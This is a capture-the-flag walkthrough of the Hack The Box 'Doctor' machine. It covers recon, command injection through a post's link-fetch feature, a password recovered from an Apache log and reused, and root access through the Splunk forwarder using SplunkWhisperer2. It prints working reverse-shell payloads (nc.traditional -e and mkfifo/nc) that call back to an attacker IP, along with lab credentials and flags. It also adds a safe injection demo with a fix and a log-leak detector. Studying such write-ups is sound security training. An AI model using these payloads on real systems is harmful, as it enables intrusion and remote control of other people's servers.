HTB Doctor done

Doctor

Notes

8089/tcp open  ssl/http Splunkd httpd

OS:

Linux

Technology:

Splunk build: 8.0.5

IP Address:

10.129.2.21

Open ports:

22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
8089/tcp open  ssl/http Splunkd httpd

Users and passwords:

Creds - http://doctors.htb/register
U: pentester
Mail: [email protected]
Pass: qwerty123 
---
Creds for user:
L: shaun
P: Guitar123
---

Nmap: 10.129.2.21

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.2.21_nmap 10.129.2.21 ; cat 10.129.2.21_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-11 11:28 CEST
Nmap scan report for 10.129.2.21
Host is up (0.035s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/

Add IP to /etc/hosts

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ cat /etc/hosts | grep doctors.htb            
10.129.2.21 doctors.htb

Ffuf: http://doctors.htb

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ ffuf -u http://doctors.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o doctors.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://doctors.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup .md .git 
 :: Output file      : doctors.htb_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

account                 [Status: 302, Size: 251, Words: 22, Lines: 4, Duration: 60ms]
archive                 [Status: 200, Size: 101, Words: 7, Lines: 6, Duration: 118ms]
home                    [Status: 302, Size: 245, Words: 22, Lines: 4, Duration: 54ms]
login                   [Status: 200, Size: 4204, Words: 1054, Lines: 95, Duration: 92ms]
logout                  [Status: 302, Size: 217, Words: 22, Lines: 4, Duration: 72ms]
register                [Status: 200, Size: 4493, Words: 1171, Lines: 101, Duration: 69ms]
reset_password          [Status: 200, Size: 3493, Words: 752, Lines: 77, Duration: 63ms]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 256ms]
:: Progress: [163752/163752] :: Job [1/1] :: 220 req/sec :: Duration: [0:06:04] :: Errors: 0 ::

Create user on the website: http://doctors.htb/register

U: pentester
Mail: [email protected]
Pass: qwerty123 

Command injection through the post link check (SSRF-style URL fetch) - revshell

Netcat listener - port 9001

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ netcat -lvnp 9001
listening on [any] 9001 ...

Netcat listener - port 2000

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ netcat -lvnp 2000
listening on [any] 2000 ...
connect to [10.10.14.102] from (UNKNOWN) [10.129.2.21] 44896

Create revshell

The application fetches any URL embedded in a new post, and the behaviour below shows that the fetch is built as a shell command: the $(...) inside the URL is expanded before the request is made, so the nc.traditional reverse shell runs as the web user and connects back to port 2000. The 9001 listener is only there to give the URL a host to point at; $IFS stands in for spaces because a literal space would terminate the URL token in the post body.

Payload: <test src=http://10.10.14.102:9001/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.102'$IFS'2000')>
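Why the payload works, as an added example that is not code from the box or from this writeup: the web app's link check is modelled by a function that interpolates the posted URL into a shell command line, which is the behaviour the $(...) expansion above demonstrates. echo stands in for the real fetch so the demo runs offline, and the constructed hostile URL carries a harmless echo in place of nc.traditional. The hardened variant beside it passes the URL as an argv element with no shell.

```python
import subprocess


def check_link_vulnerable(url: str) -> str:
    """Stand-in for the app's link check: the URL is pasted into a shell
    command string. echo replaces the real fetch so this runs offline, but
    the shell expands $(...) and $IFS before echo ever sees the argument,
    exactly as it would before curl/wget ran on the box."""
    completed = subprocess.run(f"echo {url}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout.rstrip("\n")


def check_link_fixed(url: str) -> str:
    """Hardened form: argv list, no shell, so the URL reaches the program
    byte-for-byte and $(...) is just characters inside a path."""
    completed = subprocess.run(["echo", url], capture_output=True, text=True)
    return completed.stdout.rstrip("\n")


# Constructed payload in the same shape as the one used against the box:
# $IFS stands in for spaces (a literal space would end the URL token) and a
# harmless echo replaces the nc.traditional reverse shell.
PAYLOAD = "http://10.10.14.102:9001/$(echo$IFS'cmd'$IFS'ran'$IFS'here')"


def demo():
    """Returns (output of the vulnerable checker, output of the fixed checker)."""
    return check_link_vulnerable(PAYLOAD), check_link_fixed(PAYLOAD)


if __name__ == "__main__":
    vulnerable, fixed = demo()
    # vulnerable: the inner command ran and its words were spliced into the URL
    print("vulnerable:", vulnerable)
    # fixed: the payload is passed through literally, $(...) and all
    print("fixed:     ", fixed)
```

The fix is the same one that would have closed the hole on the box: never hand attacker-controlled text to a shell; call the fetcher with an argument vector, or use an HTTP library in-process.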

Upgrade to a full TTY

script /dev/null -c bash
CTRL+Z
stty raw -echo ; fg
reset            (answer "screen" when asked for the terminal type)

Read file: /var/log/apache2/backup

Found password: Guitar123. The backup copy of the Apache access log records a POST to /reset_password whose query string carries Guitar123 in the email field: someone typed a password into the wrong form field, and because the request line (query string included) is logged, it went to disk in clear.
---
web@doctor:/var/log/apache2$ cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
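A detection pass over Apache access logs, as an added example that is not part of the writeup: the line recovered above is reused as sample input alongside two constructed lines, and the checker flags query strings that carry credential-type parameter names or any form data sent to a login/register/reset endpoint, since Apache writes the full request line to disk. The parameter names, endpoint list and the two extra log lines are assumptions made for this demo.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Tolerant combined-log matcher: the request may or may not carry an
# HTTP version, as the recovered line shows.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Parameter names that should never travel in a URL (assumed list for the demo).
SENSITIVE_KEYS = {"email", "password", "pass", "passwd", "pwd", "token", "otp"}
# Endpoints whose form data belongs in the POST body, not the query string
# (assumed list, taken from the ffuf results for this host).
CREDENTIAL_PATHS = {"/login", "/register", "/reset_password"}


def find_leaks(lines):
    """Return (ip, method, path, reason) for every request that leaks
    credential-like data into the logged request line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        params = parse_qsl(parts.query, keep_blank_values=True)
        reasons = []
        leaked = [key for key, _ in params if key.lower() in SENSITIVE_KEYS]
        if leaked:
            reasons.append("sensitive keys in query: " + ",".join(leaked))
        if parts.path in CREDENTIAL_PATHS and params:
            reasons.append(f"form data sent in query string to {parts.path}")
        if reasons:
            findings.append((m["ip"], m["method"], parts.path, "; ".join(reasons)))
    return findings


SAMPLE_LOG = [
    # the line recovered from /var/log/apache2/backup on the box
    '10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"',
    # constructed benign line
    '10.10.14.4 - - [05/Sep/2020:11:18:02 +2000] "GET /home HTTP/1.1" 200 3512 "http://doctor.htb/login" "Mozilla/5.0"',
    # constructed line with a token passed in a GET query string
    '10.10.14.4 - - [05/Sep/2020:11:19:40 +2000] "GET /account?token=abc123 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, method, path, reason in find_leaks(SAMPLE_LOG):
        print(f"{ip} {method} {path}: {reason}")
```

Running this over a real access log is the cheap way to find the same class of mistake before an attacker with read access to /var/log does; the fix on the application side is to reject credential fields in query strings outright.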

Switch to shaun (the password is reused: Guitar123) and read user.txt

web@doctor:/var/log/apache2$ su shaun
Password: 
shaun@doctor:/var/log/apache2$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
shaun@doctor:/var/log/apache2$ 
shaun@doctor:/var/log/apache2$ cd ~
shaun@doctor:~$ 
shaun@doctor:~$ ls -a
.   .bash_history  .bashrc  .config  .local    .selected_editor
..  .bash_logout   .cache   .gnupg   .profile  user.txt
shaun@doctor:~$ 
shaun@doctor:~$ cat user.txt 
598ec2738a45e21b80201a68851f0242
shaun@doctor:~$ 
shaun@doctor:~$ 

Privilege Escalation

List running processes

splunkd (the Splunk Universal Forwarder, management port 8089) runs as root, so anything it is told to execute runs as root. The _PWN_APP_ script visible in this listing is the SplunkWhisperer2 app from the next step, captured while it was running.

shaun@doctor:/tmp$ ps aux | grep splunk
root        1163  0.0  2.2 267968 90456 ?        Sl   Jul14   0:59 splunkd -p 8089 start
root        1164  0.0  0.4  77664 16084 ?        Ss   Jul14   0:00 [splunkd pid=1163] splunkd -p 8089 start [process-runner]
root        9387  0.0  0.0   2608   600 ?        S    15:26   0:00 /bin/sh /opt/splunkforwarder/etc/apps/_PWN_APP_/bin/pwn.bat
shaun       9400  0.0  0.0  17668   732 pts/0    S+   15:31   0:00 grep --color=auto splunk

Netcat - listener

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ netcat -lvnp 4000
listening on [any] 4000 ...

Exploit: SplunkWhisperer2

The forwarder's management API on 8089 accepts shaun's reused credentials (Guitar123). SplunkWhisperer2 authenticates, serves an app bundle from a local HTTP server (--lport 5000) and installs it; splunkd then runs the bundle's bin/pwn.bat as root, which is where the payload's reverse shell to port 4000 comes from.

┌──(kali㉿kali)-[~/…/HTB/HTB_Doctor/SplunkWhisperer2/PySplunkWhisperer2]
└─$ python3 PySplunkWhisperer2_remote.py --host 10.129.2.21 --port 8089 --lhost 10.10.14.102 --lport 5000 --username shaun --password Guitar123 --payload "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.102 4000 >/tmp/f"
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp1tsox2jk.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.102:5000/
10.129.2.21 - - [15/Jul/2025 15:26:37] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

Catch the root shell on port 4000 and read root.txt

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ netcat -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.14.102] from (UNKNOWN) [10.129.2.21] 43382
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# 
# cd /root  
# ls -a
.
..
.bash_history
.bashrc
.cache
.config
.dbus
.gnupg
.local
.profile
root.txt
.selected_editor
# cat root.txt
d74c6ad8f136509ba568848b70f5d269
# 

References

[SplunkWhisperer2](https://github.com/cnotin/SplunkWhisperer2)

Lessons Learned
